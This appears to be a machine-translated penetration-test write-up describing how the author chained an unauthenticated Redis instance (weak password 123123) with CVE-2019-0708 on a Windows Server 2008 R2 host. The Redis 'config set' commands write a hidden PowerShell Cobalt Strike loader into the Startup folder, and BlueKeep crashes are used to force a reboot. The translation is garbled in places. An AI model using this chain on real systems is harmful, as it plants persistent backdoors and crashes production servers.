Title: Redis Unauthorized + CVE-2019-0708 Combination Fist Utilization

0x01 Introduction

This test is a practical test. The test environment is part of the authorized project. The sensitive information content has been coded and is for discussion and learning only. Please obtain authorization when testing.

When I got the authorized project, the customer only gave me a company name, and here I was replaced by a certain company.

0x02 Information Collection

The old method is to scan the subdomain name and then scan the directory. I found a mess, but there was no point in using it, and it was a cloud host. Further detection of assets, Ouli gave a discovery of CVE-2019-0708. Targetr is a Windows Server 2008 R2 system.

0x03 Getshell

I thought to myself that I discovered CVE-2019-0708, so the shell will be stable. At that time, I took out my big health care msf and made a comeback. Damn, I found that it could not be used, and I detected a vulnerability, but failed to create the session.

was unwilling to give up, and the settarget was useless. After attacking more than 20 times, the same mistake was still the same, which caused the customer's target machine and followed the blue screen more than 20 times.

Continue reading, I found that there is a redis asset. I tried a weak password and found that the password was 123123. Let's check the information first:

There is a difficulty in using it here, that is, we don’t know the actual physical path of the website at all. Trying to report an error or blast the physical path is fruitless, so we cannot get the Webshell by writing a sentence or other form; there is no rebound and utilization like Linux here; there is no planned task to write.

After the previous information collection, it was found that it was Windows Server 2008 r2. We can write a script to start the Trojan and put it in the startup, and then use CVE-2019-0708 to "force" the host to restart.

Just do it, use Powershell's Cs horse here (please note that it is not to be killed, not discussed here). First set the working directory of Redis to the startup directory of Windows, and then write the CS horse. It is best to remember to save, otherwise it will always be in memory.

Use CVE-2019-0708 to "force" the host to restart. You can see that it has been successfully launched.

After actual testing, this startup item can pass through a domestic software killer, but it will be intercepted when calling cmd.

0x03  Summary

1. Through information collection, the target has a cve-2019-0708 vulnerability. The vulnerability discovery system blue screen restarted 2. Through nmap scanning, it was found that the target system has opened port 3679, which does not have redis service. 3. Try to enter 123123 through a weak password to enter the target system, but now you don’t know the root directory of the website, and can only write the backdoor to the startup item 4. Generate PS script backdoor in CS 5. Write horse config set dir 'c:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/'config set dbfilename update.batset shell '\r\n\r\npowershell.exe -nop -w hidden -c 'saveinfo6. Restart through cve-2019-0708 vulnerability blue screen, successfully launched the CS original text connection: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247489578idx=1sn=9dc27c1ad60bfbb4fdca0316ce18ee4cchksm=cfa6bc39f8d1352f5b0feb60e8029a68f8719ce8ac42a3d3475db722a319dacfe92e97da7607scene=178cur_album_id=1553386251775492098#rd